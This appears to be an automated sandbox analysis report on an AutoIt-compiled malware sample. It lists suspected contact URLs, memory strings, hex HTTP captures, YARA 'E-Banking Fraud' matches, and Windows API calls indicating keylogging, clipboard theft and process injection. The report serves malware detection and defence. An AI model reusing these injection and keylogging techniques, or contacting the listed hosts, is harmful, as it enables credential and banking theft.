8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:55:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:55:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 39 34 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000004E94000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2843915674.0000000033CC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://funnystory.online/2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADo
                Source: hnmibsTvfR.exe, 00000007.00000002.3303040517.00000000007DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.a1shop.shop
                Source: hnmibsTvfR.exe, 00000007.00000002.3303040517.00000000007DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.a1shop.shop/5cnx/
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
                Source: icsunattend.exe, 00000006.00000002.3302124025.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth.
                Source: icsunattend.exe, 00000006.00000002.3302124025.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: icsunattend.exe, 00000006.00000002.3302124025.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: icsunattend.exe, 00000006.00000002.3302124025.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: icsunattend.exe, 00000006.00000002.3302124025.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: icsunattend.exe, 00000006.00000002.3302124025.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: icsunattend.exe, 00000006.00000002.3302124025.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: icsunattend.exe, 00000006.00000003.2733992852.0000000007550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
                Source: hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://server194.hosting.reg.ru/manager
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/#request
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000006.00000002.3304456237.0000000005026000.00000004.10000000.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3304107723.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E96B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E96B0C
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E96D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E96D07
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E96B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E96B0C
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E82B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E82B37
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00EAF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EAF7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3303150675.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552287327.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552706561.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552000811.0000000002140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3303269624.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3301917962.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3303084240.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: This is a third-party compiled AutoIt script.0_2_00E43D19
                Source: Fi#U015f.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Fi#U015f.exe, 00000000.00000000.2059012294.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e996595a-1
                Source: Fi#U015f.exe, 00000000.00000000.2059012294.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_21097b31-9
                Source: Fi#U015f.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2c46adaa-c
                Source: Fi#U015f.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ffbb4c8f-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0216C8E3 NtClose,2_2_0216C8E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72B60 NtClose,LdrInitializeThunk,2_2_02D72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02D72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02D72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D735C0 NtCreateMutant,LdrInitializeThunk,2_2_02D735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D74340 NtSetContextThread,2_2_02D74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D74650 NtSuspendThread,2_2_02D74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72AD0 NtReadFile,2_2_02D72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72AF0 NtWriteFile,2_2_02D72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72AB0 NtWaitForSingleObject,2_2_02D72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72BF0 NtAllocateVirtualMemory,2_2_02D72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72BE0 NtQueryValueKey,2_2_02D72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72B80 NtQueryInformationFile,2_2_02D72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72BA0 NtEnumerateValueKey,2_2_02D72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72EE0 NtQueueApcThread,2_2_02D72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72E80 NtReadVirtualMemory,2_2_02D72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72EA0 NtAdjustPrivilegesToken,2_2_02D72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72E30 NtWriteVirtualMemory,2_2_02D72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72FE0 NtCreateFile,2_2_02D72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72F90 NtProtectVirtualMemory,2_2_02D72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72FB0 NtResumeThread,2_2_02D72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72FA0 NtQuerySection,2_2_02D72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72F60 NtCreateProcessEx,2_2_02D72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72F30 NtCreateSection,2_2_02D72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72CC0 NtQueryVirtualMemory,2_2_02D72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72CF0 NtOpenProcess,2_2_02D72CF0
